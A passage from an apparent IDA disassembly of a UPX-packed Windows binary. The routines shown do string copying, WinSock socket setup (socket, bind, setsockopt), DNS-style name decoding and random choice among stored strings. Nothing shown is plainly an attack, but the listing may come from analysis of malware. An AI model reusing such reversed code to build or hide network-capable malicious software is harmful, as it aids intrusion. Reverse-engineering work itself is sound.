sub esi, eax
loc_407A26: ; CODE XREF: sub_407640+3EE�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_407A26
jmp short loc_407A4B
; ---------------------------------------------------------------------------
loc_407A32: ; CODE XREF: sub_407640+2D9�j
xor eax, eax
mov [esp+0Ch+arg_0], eax
jmp loc_407950
; ---------------------------------------------------------------------------
loc_407A3D: ; CODE XREF: sub_407640+3DC�j
mov eax, edx
sub esi, edx
loc_407A41: ; CODE XREF: sub_407640+409�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_407A41
loc_407A4B: ; CODE XREF: sub_407640+3F0�j
mov edi, offset byte_4243C3
mov esi, edx
mov ecx, 1
xor eax, eax
repe cmpsb
jnz short loc_407A7C
lea eax, [ebx+6004h]
lea edx, [esp+0Ch+arg_744]
sub edx, eax
lea esp, [esp+0]
loc_407A70: ; CODE XREF: sub_407640+438�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407A70
jmp short loc_407A91
; ---------------------------------------------------------------------------
loc_407A7C: ; CODE XREF: sub_407640+41B�j
lea esi, [esp+0Ch+arg_744]
mov eax, edx
sub esi, edx
loc_407A87: ; CODE XREF: sub_407640+44F�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_407A87
loc_407A91: ; CODE XREF: sub_407640+43A�j
mov ecx, [esp+0Ch+arg_10]
mov edx, [ebx+ecx]
push edx
lea eax, [esp+10h+arg_14]
push offset dword_4243F0
push eax
call sub_419B8A
add esp, 0Ch
xor ebx, ebx
xor eax, eax
nop
loc_407AB0: ; CODE XREF: sub_407640+47E�j
mov cl, byte ptr [esp+eax+0Ch+arg_14]
mov byte ptr [esp+eax+0Ch+arg_430], cl
inc eax
test cl, cl
jnz short loc_407AB0
mov ecx, [esp+10h]
mov edx, [ecx+10h]
cmp [edx+6CCh], ebx
jz short loc_407B3D
mov edi, [ebp+arg_10]
mov esi, [ebp+arg_14]
lea eax, [esp+0Ch+arg_124]
mov [edi+8], ebx
push eax
mov [esi+8], ebx
call sub_412210
add esp, 4
cmp eax, ebx
mov [edi+8], ebx
mov [esp+0Ch+arg_0], eax
mov [esi+8], ebx
jnz short loc_407B45
loc_407AF9: ; CODE XREF: sub_407640+503�j
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_C]
mov edi, [esp+0Ch+arg_10]
mov esi, [esp+0Ch+arg_4]
inc ecx
add edx, 40h
mov [esp+0Ch+arg_8], ecx
mov ecx, [esp+10h]
mov [esp+0Ch+arg_C], edx
mov edx, [ecx+8]
mov ecx, [edx+7108h]
add edi, 4
add esi, 80h
cmp ecx, ebx
mov [esp+0Ch+arg_10], edi
mov [esp+0Ch+arg_4], esi
jz loc_407985
jmp short loc_407B54
; ---------------------------------------------------------------------------
loc_407B3D: ; CODE XREF: sub_407640+48D�j
xor eax, eax
mov [esp+0Ch+arg_0], eax
jmp short loc_407AF9
; ---------------------------------------------------------------------------
loc_407B45: ; CODE XREF: sub_407640+4B7�j
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+10h]
mov [edx+1Ch], ecx
loc_407B50: ; CODE XREF: sub_407640+327�j
; sub_407640+35E�j
test eax, eax
jnz short loc_407B69
loc_407B54: ; CODE XREF: sub_407640+347�j
; sub_407640+4FB�j
mov eax, [esp+10h]
mov ecx, [eax+8]
mov eax, [ecx+7108h]
test eax, eax
jz loc_407DE7
loc_407B69: ; CODE XREF: sub_407640+512�j
mov ebx, [esp+10h]
xor eax, eax
mov ecx, 400h
lea edi, [esp+0Ch+arg_9EC]
rep stosd
lea edx, [esp+0Ch+arg_9EC]
push edx
mov edx, [ebp+arg_0]
lea eax, [esp+10h+arg_24]
push eax
mov eax, [ebx+4]
lea ecx, [esp+14h+arg_A4]
push ecx
push edx
push eax
call sub_411DE0
add esp, 14h
test eax, eax
mov [esp+0Ch+arg_4], eax
jz short loc_407BFA
lea ecx, [esp+0Ch+arg_24]
push ecx
call sub_40D720
add esp, 4
test eax, eax
jz short loc_407BFA
lea edx, [esp+0Ch+arg_A4]
push edx
call sub_40D8F0
add esp, 4
test eax, eax
jnz short loc_407BE9
loc_407BCF: ; CODE XREF: sub_407640+157�j
mov eax, 3
mov ecx, [esp+0Ch+arg_19F0]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_407BE9: ; CODE XREF: sub_407640+58D�j
lea eax, [esp+0Ch+arg_24]
push eax
call sub_40F110
add esp, 4
test eax, eax
jnz short loc_407C14
loc_407BFA: ; CODE XREF: sub_407640+13F�j
; sub_407640+16C�j ...
mov eax, 2
mov ecx, [esp+0Ch+arg_19F0]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_407C14: ; CODE XREF: sub_407640+5B8�j
mov eax, [ebx+8]
mov edi, [eax+710Ch]
xor edx, edx
cmp edi, 1
setnle dl
lea esi, [esp+0Ch+arg_53C]
mov ecx, edx
shl ecx, 7
lea eax, [ecx+eax+2004h]
sub esi, eax
lea ebx, [ebx+0]
loc_407C40: ; CODE XREF: sub_407640+608�j
mov cl, [eax]
mov [eax+esi], cl
inc eax
test cl, cl
jnz short loc_407C40
mov eax, [ebx+8]
shl edx, 6
lea esi, [edx+eax]
lea eax, [esi+4004h]
lea edx, [esp+0Ch+arg_964]
sub edx, eax
loc_407C62: ; CODE XREF: sub_407640+62A�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
test cl, cl
jnz short loc_407C62
lea ebx, [esi+6004h]
xor edx, edx
mov edi, offset byte_4243C3
mov esi, ebx
mov ecx, 1
repe cmpsb
lea edx, [esp+0Ch+arg_640]
jnz short loc_407CAC
mov eax, [esp+10h]
mov eax, [eax+8]
add eax, 6004h
sub edx, eax
lea esp, [esp+0]
loc_407CA0: ; CODE XREF: sub_407640+668�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
test cl, cl
jnz short loc_407CA0
jmp short loc_407CBA
; ---------------------------------------------------------------------------
loc_407CAC: ; CODE XREF: sub_407640+649�j
mov eax, ebx
sub edx, ebx
loc_407CB0: ; CODE XREF: sub_407640+678�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
test cl, cl
jnz short loc_407CB0
loc_407CBA: ; CODE XREF: sub_407640+66A�j
xor edx, edx
mov edi, offset byte_4243C3
mov esi, ebx
mov ecx, 1
repe cmpsb
lea edx, [esp+0Ch+arg_744]
jnz short loc_407CED
mov eax, [esp+10h]
mov eax, [eax+8]
add eax, 6004h
sub edx, eax
loc_407CE1: ; CODE XREF: sub_407640+6A9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407CE1
jmp short loc_407CFB
; ---------------------------------------------------------------------------
loc_407CED: ; CODE XREF: sub_407640+691�j
mov eax, ebx
sub edx, ebx
loc_407CF1: ; CODE XREF: sub_407640+6B9�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
test cl, cl
jnz short loc_407CF1
loc_407CFB: ; CODE XREF: sub_407640+6AB�j
mov ecx, [esp+10h]
mov eax, [ecx+8]
mov edx, [esp+0Ch+arg_8]
mov eax, [eax+edx*4+7004h]
push eax
lea ecx, [esp+10h+arg_14]
push offset dword_4243F0
push ecx
call sub_419B8A
mov al, byte_424472
mov dx, word_424470
mov [esp+18h+arg_432], al
mov eax, [esp+18h+arg_4]
add esp, 0Ch
xor edi, edi
test eax, eax
mov [esp+0Ch+arg_430], dx
jle loc_407DE7
lea ebx, [esp+0Ch+arg_9EC]
lea esi, [esp+0Ch+arg_438]
mov ecx, ebx
sub esi, ecx
jmp short loc_407D60
; ---------------------------------------------------------------------------
align 10h
loc_407D60: ; CODE XREF: sub_407640+71B�j
; sub_407640+784�j
mov eax, ebx
loc_407D62: ; CODE XREF: sub_407640+72A�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_407D62
mov edx, [esp+10h]
mov eax, [edx+10h]
mov ecx, [eax+6CCh]
test ecx, ecx
jz short loc_407DDF
mov ecx, [ebp+arg_10]
mov edx, [ebp+arg_14]
xor eax, eax
mov [ecx+8], eax
mov [edx+8], eax
lea eax, [esp+0Ch+arg_124]
push eax
call sub_412210
mov edx, [ebp+arg_10]
xor ecx, ecx
mov [edx+8], ecx
mov edx, [ebp+arg_14]
add esp, 4
cmp eax, ecx
mov [esp+0Ch+arg_0], eax
mov [edx+8], ecx
jz short loc_407DE7
mov eax, [esp+0Ch+arg_4]
inc edi
sub esi, 80h
add ebx, 80h
cmp edi, eax
jl short loc_407D60
mov eax, [esp+0Ch+arg_0]
mov ecx, [esp+0Ch+arg_19F0]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_407DDF: ; CODE XREF: sub_407640+73B�j
mov [esp+0Ch+arg_0], 0
loc_407DE7: ; CODE XREF: sub_407640+523�j
; sub_407640+703�j ...
mov eax, [esp+0Ch+arg_0]
mov ecx, [esp+0Ch+arg_19F0]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_407E00: ; CODE XREF: sub_407640+28�j
; sub_407640+33�j ...
mov ecx, [esp+0Ch+arg_19F0]
mov eax, 1
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
sub_407640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407E20 proc near ; CODE XREF: sub_40C7C0+C1�p
mov eax, [ecx+0Ch]
mov eax, [eax+58h]
retn
sub_407E20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407E30 proc near ; CODE XREF: sub_4082D0+3A�p
arg_0 = byte ptr 4
push esi
push edi
mov edi, dword_424254
push 4
lea eax, [esp+0Ch+arg_0]
push eax
push 1006h
mov esi, ecx
mov ecx, [esi+4]
push 6
push ecx
call edi ; setsockopt
mov eax, [esi+4]
push 4
lea edx, [esp+0Ch+arg_0]
push edx
push 1005h
push 6
push eax
call edi ; setsockopt
pop edi
pop esi
retn 4
sub_407E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407E70 proc near ; CODE XREF: sub_4082D0+2A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 14h
mov eax, dword_42A290
mov [esp+14h+var_4], eax
xor eax, eax
mov [esp+14h+var_14], eax
mov [esp+14h+var_10], eax
mov [esp+14h+var_C], eax
mov [esp+14h+var_8], eax
mov eax, [esp+14h+arg_4]
test eax, eax
push esi
mov esi, ecx
mov word ptr [esp+18h+var_14], 2
jnz short loc_407EE5
push eax
call dword_424244 ; htonl
loc_407EA6: ; CODE XREF: sub_407E70+7F�j
mov ecx, [esp+18h+arg_0]
push ecx
mov [esp+1Ch+var_10], eax
call dword_424264 ; htons
push 10h
lea edx, [esp+1Ch+var_14]
mov word ptr [esp+1Ch+var_14+2], ax
mov eax, [esi+4]
push edx
push eax
call dword_424248 ; bind
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
pop esi
mov eax, ecx
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn 8
; ---------------------------------------------------------------------------
loc_407EE5: ; CODE XREF: sub_407E70+2D�j
push eax
call dword_42424C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_407EA6
push 2726h
call dword_424250 ; WSASetLastError
mov ecx, [esp+18h+var_4]
xor eax, eax
pop esi
call sub_4192B6
add esp, 14h
retn 8
sub_407E70 endp
; ---------------------------------------------------------------------------
align 10h
loc_407F10: ; DATA XREF: UPX0:off_424474�o
test byte ptr [esp+4], 1
push esi
mov esi, ecx
mov dword ptr [esi], offset off_424474
jz short loc_407F29
push esi
call sub_41930D
add esp, 4
loc_407F29: ; CODE XREF: UPX0:00407F1E�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407F30 proc near ; CODE XREF: UPX0:00408333�p
; UPX0:00422FF9�j
mov dword ptr [ecx], offset off_424474
retn
sub_407F30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407F40 proc near ; CODE XREF: sub_408C40+131�p
var_C4 = byte ptr -0C4h
var_84 = byte ptr -84h
var_44 = byte ptr -44h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 0C4h
mov eax, dword_42A290
push esi
push edi
mov edi, [esp+0CCh+arg_0]
test edi, edi
mov [esp+0CCh+var_4], eax
mov esi, ecx
jz loc_4081FB
mov eax, [esi+18h]
test eax, eax
jz loc_4081FB
mov eax, [esi+8]
add eax, 6004h
push eax
call sub_40D270
lea ecx, [esp+0D0h+var_84]
push ecx
call sub_40CDA0
lea edx, [esp+0D4h+var_44]
push edx
call sub_40D9F0
add esp, 0Ch
call sub_419853
and eax, 80000001h
jns short loc_407FA9
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_407FA9: ; CODE XREF: sub_407F40+62�j
jnz loc_408038
mov eax, [esi+10h]
lea ecx, [eax+65Ch]
push ecx
lea edx, [eax+62Ch]
push edx
add eax, 414h
push eax
lea eax, [esp+0D8h+var_84]
push eax
lea ecx, [esp+0DCh+var_44]
push ecx
push edi
mov ecx, esi
call sub_407640
test eax, eax
jz loc_408200
cmp eax, 2
jz loc_408200
cmp eax, 3
jz loc_408200
mov eax, [esi+10h]
lea edx, [eax+66Ch]
push edx
lea ecx, [eax+63Ch]
push ecx
add eax, 518h
push eax
lea edx, [esp+0D8h+var_84]
push edx
lea eax, [esp+0DCh+var_44]
push eax
mov ecx, esi
push edi
call sub_407640
pop edi
pop esi
mov ecx, [esp+0C4h+var_4]
call sub_4192B6
add esp, 0C4h
retn 4
; ---------------------------------------------------------------------------
loc_408038: ; CODE XREF: sub_407F40:loc_407FA9�j
call sub_419853
and eax, 80000001h
jns short loc_408049
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_408049: ; CODE XREF: sub_407F40+102�j
push 0
jnz short loc_4080CA
call sub_419875
push eax
call sub_419846
add esp, 8
call sub_419853
cdq
mov ecx, 3
idiv ecx
cmp edx, 1
jg short loc_40809D
mov edx, [esi+0Ch]
mov eax, [edx+58h]
add eax, 1Ch
lea edx, [esp+0CCh+var_C4]
sub edx, eax
lea esp, [esp+0]
loc_408080: ; CODE XREF: sub_407F40+148�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408080
mov eax, [esi+10h]
lea ecx, [eax+67Ch]
add eax, 61Ch
jmp loc_408138
; ---------------------------------------------------------------------------
loc_40809D: ; CODE XREF: sub_407F40+12B�j
mov eax, [esi+0Ch]
mov eax, [eax+58h]
add eax, 120h
lea edx, [esp+0CCh+var_C4]
sub edx, eax
mov edi, edi
loc_4080B0: ; CODE XREF: sub_407F40+178�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4080B0
mov eax, [esi+10h]
lea ecx, [eax+67Ch]
add eax, 61Ch
jmp short loc_408138
; ---------------------------------------------------------------------------
loc_4080CA: ; CODE XREF: sub_407F40+10B�j
call sub_419875
push eax
call sub_419846
add esp, 8
call sub_419853
cdq
mov ecx, 3
idiv ecx
cmp edx, 1
jg short loc_40810C
mov edx, [esi+0Ch]
mov eax, [edx+58h]
add eax, 224h
lea edx, [esp+0CCh+var_C4]
sub edx, eax
jmp short loc_408100
; ---------------------------------------------------------------------------
align 10h
loc_408100: ; CODE XREF: sub_407F40+1BB�j
; sub_407F40+1C8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408100
jmp short loc_40812A
; ---------------------------------------------------------------------------
loc_40810C: ; CODE XREF: sub_407F40+1A8�j
mov eax, [esi+0Ch]
mov eax, [eax+58h]
add eax, 328h
lea edx, [esp+0CCh+var_C4]
sub edx, eax
lea ecx, [ecx+0]
loc_408120: ; CODE XREF: sub_407F40+1E8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408120
loc_40812A: ; CODE XREF: sub_407F40+1CA�j
mov eax, [esi+10h]
lea ecx, [eax+68Ch]
add eax, 62Ch
loc_408138: ; CODE XREF: sub_407F40+158�j
; sub_407F40+188�j
push ecx
push eax
lea edx, [esp+0D4h+var_C4]
push edx
lea eax, [esp+0D8h+var_84]
push eax
lea ecx, [esp+0DCh+var_44]
push ecx
mov ecx, esi
push edi
call sub_407640
test eax, eax
jz loc_408200
cmp eax, 2
jz loc_408200
cmp eax, 3
jz loc_408200
call sub_419853
cdq
mov ecx, 3
idiv ecx
cmp edx, 1
jg short loc_40819D
mov edx, [esi+0Ch]
mov eax, [edx+58h]
add eax, 42Ch
lea edx, [esp+0CCh+var_C4]
sub edx, eax
loc_408191: ; CODE XREF: sub_407F40+259�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408191
jmp short loc_4081BA
; ---------------------------------------------------------------------------
loc_40819D: ; CODE XREF: sub_407F40+23E�j
mov eax, [esi+0Ch]
mov eax, [eax+58h]
add eax, 530h
lea edx, [esp+0CCh+var_C4]
sub edx, eax
mov edi, edi
loc_4081B0: ; CODE XREF: sub_407F40+278�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4081B0
loc_4081BA: ; CODE XREF: sub_407F40+25B�j
mov eax, [esi+10h]
lea ecx, [eax+69Ch]
push ecx
add eax, 63Ch
push eax
lea edx, [esp+0D4h+var_C4]
push edx
lea eax, [esp+0D8h+var_84]
push eax
lea ecx, [esp+0DCh+var_44]
push ecx
mov ecx, esi
push edi
call sub_407640
pop edi
pop esi
mov ecx, [esp+0C4h+var_4]
call sub_4192B6
add esp, 0C4h
retn 4
; ---------------------------------------------------------------------------
loc_4081FB: ; CODE XREF: sub_407F40+1F�j
; sub_407F40+2A�j
mov eax, 1
loc_408200: ; CODE XREF: sub_407F40+9D�j
; sub_407F40+A6�j ...
mov ecx, [esp+0CCh+var_4]
pop edi
pop esi
call sub_4192B6
add esp, 0C4h
retn 4
sub_407F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408220 proc near ; CODE XREF: sub_406C20+54�p
; sub_408900+38�p ...
arg_0 = dword ptr 4
push esi
mov esi, [ecx+10h]
test esi, esi
jnz short loc_40822E
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40822E: ; CODE XREF: sub_408220+6�j
mov edx, [esp+4+arg_0]
mov eax, 1
cmp edx, eax
push edi
jl short loc_408250
mov edi, [ecx+0Ch]
nop
loc_408240: ; CODE XREF: sub_408220+2E�j
cmp esi, edi
jz short loc_408250
test esi, esi
jz short loc_40826C
mov esi, [esi+8]
inc eax
cmp eax, edx
jle short loc_408240
loc_408250: ; CODE XREF: sub_408220+1A�j
; sub_408220+22�j
mov eax, [esi+8]
test eax, eax
jz short loc_40827B
mov edx, [esi+4]
mov [eax+4], edx
mov eax, [esi+4]
test eax, eax
jz short loc_408273
mov edx, [esi+8]
mov [eax+8], edx
jmp short loc_4082A1
; ---------------------------------------------------------------------------
loc_40826C: ; CODE XREF: sub_408220+26�j
pop edi
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_408273: ; CODE XREF: sub_408220+42�j
mov eax, [esi+8]
mov [ecx+10h], eax
jmp short loc_4082A1
; ---------------------------------------------------------------------------
loc_40827B: ; CODE XREF: sub_408220+35�j
mov eax, [esi+4]
test eax, eax
jz short loc_408293
mov edx, eax
mov dword ptr [edx+8], 0
mov eax, [esi+4]
mov [ecx+0Ch], eax
jmp short loc_4082A1
; ---------------------------------------------------------------------------
loc_408293: ; CODE XREF: sub_408220+60�j
mov dword ptr [ecx+10h], 0
mov dword ptr [ecx+0Ch], 0
loc_4082A1: ; CODE XREF: sub_408220+4A�j
; sub_408220+59�j ...
mov eax, [ecx+14h]
test eax, eax
mov edx, [ecx+10h]
mov [ecx+18h], edx
jz short loc_4082BD
mov eax, [esi]
test eax, eax
jz short loc_4082BD
push eax
call sub_41930D
add esp, 4
loc_4082BD: ; CODE XREF: sub_408220+8C�j
; sub_408220+92�j
push esi
call sub_41930D
add esp, 4
pop edi
mov eax, 1
pop esi
retn 4
sub_408220 endp
; =============== S U B R O U T I N E =======================================
sub_4082D0 proc near ; CODE XREF: sub_408780+10�p
push esi
push 0
mov esi, ecx
push 1
push 2
mov dword ptr [esi+4], 0FFFFFFFFh
mov dword ptr [esi], offset off_424480
call dword_424260 ; socket
cmp eax, 0FFFFFFFFh
mov [esi+4], eax
jz short loc_408313
push 0
push 0
mov ecx, esi
call sub_407E70
test eax, eax
jz short loc_408313
push 3E8h
mov ecx, esi
call sub_407E30
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_408313: ; CODE XREF: sub_4082D0+22�j
; sub_4082D0+31�j
call dword_424240 ; WSAGetLastError
mov [esi+8], eax
mov dword ptr [esi+4], 0FFFFFFFFh
mov eax, esi
pop esi
retn
sub_4082D0 endp
; ---------------------------------------------------------------------------
align 10h
loc_408330: ; DATA XREF: UPX0:off_424480�o
push esi
mov esi, ecx
call sub_407F30
test byte ptr [esp+8], 1
jz short loc_408348
push esi
call sub_41930D
add esp, 4
loc_408348: ; CODE XREF: UPX0:0040833D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
loc_408350: ; DATA XREF: UPX0:off_424478�o
push esi
mov esi, ecx
mov eax, [esi+8]
push edi
xor edi, edi
cmp eax, edi
mov dword ptr [esi], offset off_424478
jz short loc_40836F
mov eax, [esi+4]
push eax
call sub_4198AE
add esp, 4
loc_40836F: ; CODE XREF: UPX0:00408361�j
test byte ptr [esp+0Ch], 1
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
mov dword ptr [esi+10h], 40h
mov [esi+14h], edi
jz short loc_408392
push esi
call sub_41930D
add esp, 4
loc_408392: ; CODE XREF: UPX0:00408387�j
pop edi
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4083A0 proc near ; CODE XREF: UPX0:004086A3�p
; UPX0:00423007�j
push esi
mov esi, ecx
mov eax, [esi+8]
push edi
xor edi, edi
cmp eax, edi
mov dword ptr [esi], offset off_424478
jz short loc_4083BF
mov eax, [esi+4]
push eax
call sub_4198AE
add esp, 4
loc_4083BF: ; CODE XREF: sub_4083A0+11�j
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
mov [esi+14h], edi
pop edi
mov dword ptr [esi+10h], 40h
pop esi
retn
sub_4083A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4083E0 proc near ; DATA XREF: UPX0:00424488�o
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 0Ch
push ebx
push ebp
push esi
push edi
push 100h
mov ebp, ecx
call sub_4191BC
mov esi, eax
mov byte ptr [esi], 0
mov eax, [ebp+14h]
mov [esp+20h+var_4], eax
mov eax, [esp+20h+arg_0]
add esp, 4
test eax, eax
mov [esp+1Ch+var_8], esi
jz short loc_408411
mov [ebp+14h], eax
loc_408411: ; CODE XREF: sub_4083E0+2C�j
; sub_4083E0+DF�j
push 1
lea ecx, [esp+20h+var_9]
push ecx
mov ecx, ebp
call sub_4085A0
mov al, [esp+1Ch+var_9]
test al, al
jz loc_4084C4
test al, 0C0h
jnz loc_40851E
movzx edx, al
inc edx
push edx
call sub_4191BC
movzx ecx, [esp+20h+var_9]
add esp, 4
inc ecx
mov edx, ecx
mov ebx, eax
shr ecx, 2
xor eax, eax
mov edi, ebx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
movzx eax, [esp+1Ch+var_9]
push eax
push ebx
mov ecx, ebp
call sub_4085A0
mov eax, ebx
mov ecx, ebx
lea esp, [esp+0]
loc_408470: ; CODE XREF: sub_4083E0+95�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_408470
mov edx, [esp+1Ch+var_8]
mov edi, edx
sub eax, ecx
mov esi, ecx
dec edi
loc_408482: ; CODE XREF: sub_4083E0+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_408482
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, edx
dec edi
jmp short loc_4084A0
; ---------------------------------------------------------------------------
align 10h
loc_4084A0: ; CODE XREF: sub_4083E0+BB�j
; sub_4083E0+C6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4084A0
mov cx, word_4243EC
push ebx
mov [edi], cx
call sub_4198AE
mov esi, [esp+20h+var_8]
add esp, 4
jmp loc_408411
; ---------------------------------------------------------------------------
loc_4084C4: ; CODE XREF: sub_4083E0+45�j
mov eax, [esp+1Ch+arg_0]
test eax, eax
jz short loc_4084D3
mov edx, [esp+1Ch+var_4]
mov [ebp+14h], edx
loc_4084D3: ; CODE XREF: sub_4083E0+EA�j
mov eax, esi
lea edx, [eax+1]
loc_4084D8: ; CODE XREF: sub_4083E0+FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4084D8
sub eax, edx
mov [esp+1Ch+arg_0], eax
jz short loc_408512
mov eax, esi
lea edx, [eax+1]
lea esp, [esp+0]
loc_4084F0: ; CODE XREF: sub_4083E0+115�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4084F0
sub eax, edx
cmp byte ptr [eax+esi-1], 2Eh
jnz short loc_408512
mov eax, esi
lea edx, [eax+1]
loc_408505: ; CODE XREF: sub_4083E0+12A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408505
sub eax, edx
mov [eax+esi-1], cl
loc_408512: ; CODE XREF: sub_4083E0+105�j
; sub_4083E0+11E�j
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_40851E: ; CODE XREF: sub_4083E0+4D�j
xor ecx, ecx
and al, 3Fh
mov ch, al
push 1
lea edx, [esp+20h+var_9]
push edx
mov [esp+24h+var_9], al
mov esi, ecx
mov ecx, ebp
call sub_4085A0
movzx ax, [esp+1Ch+var_9]
mov edx, [ebp+0]
mov ecx, ebp
or esi, eax
movzx eax, si
push eax
call dword ptr [edx+4]
mov ecx, eax
mov edx, eax
loc_408550: ; CODE XREF: sub_4083E0+175�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_408550
mov ebx, [esp+1Ch+var_8]
sub ecx, edx
mov edi, ebx
mov esi, edx
mov edx, ecx
dec edi
loc_408564: ; CODE XREF: sub_4083E0+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_408564
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
push eax
rep movsb
call sub_4198AE
mov eax, [esp+20h+arg_0]
add esp, 4
test eax, eax
jz short loc_408592
mov ecx, [esp+1Ch+var_4]
mov [ebp+14h], ecx
loc_408592: ; CODE XREF: sub_4083E0+1A9�j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
add esp, 0Ch
retn 4
sub_4083E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4085A0 proc near ; CODE XREF: sub_4083E0+3A�p
; sub_4083E0+83�p ...
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0FFFFFFFFh
push offset SEH_4085A0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10Ch
mov eax, dword_42A290
mov [esp+118h+var_10], eax
mov eax, ecx
mov edx, [eax+14h]
mov ecx, [eax+0Ch]
push ebx
mov ebx, [esp+11Ch+arg_4]
push esi
lea esi, [edx+ebx]
cmp esi, ecx
jle short loc_40864E
push ecx
push ebx
push edx
push 30h
push offset dword_428858
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+130h+var_110]
push eax
call sub_419B8A
push 30Ch
call sub_4191C1
add esp, 18h
mov [esp+120h+var_114], eax
test eax, eax
mov [esp+120h+var_4], 0
jz short loc_40862E
lea ecx, [esp+120h+var_110]
push ecx
push eax
call sub_407090
add esp, 8
jmp short loc_408630
; ---------------------------------------------------------------------------
loc_40862E: ; CODE XREF: sub_4085A0+7C�j
xor eax, eax
loc_408630: ; CODE XREF: sub_4085A0+8C�j
push offset dword_4264B4
lea edx, [esp+124h+var_118]
push edx
mov [esp+128h+var_4], 0FFFFFFFFh
mov [esp+128h+var_118], eax
call sub_41A2B3
loc_40864E: ; CODE XREF: sub_4085A0+3D�j
mov esi, [eax+4]
add esi, edx
push edi
mov edi, [esp+124h+arg_0]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
add [eax+14h], ebx
mov ecx, [esp+124h+var_C]
pop edi
pop esi
mov large fs:0, ecx
mov ecx, [esp+11Ch+var_10]
pop ebx
call sub_4192B6
add esp, 118h
retn 8
sub_4085A0 endp
; ---------------------------------------------------------------------------
align 10h
loc_4086A0: ; DATA XREF: UPX0:off_424484�o
push esi
mov esi, ecx
call sub_4083A0
test byte ptr [esp+8], 1
jz short loc_4086B8
push esi
call sub_41930D
add esp, 4
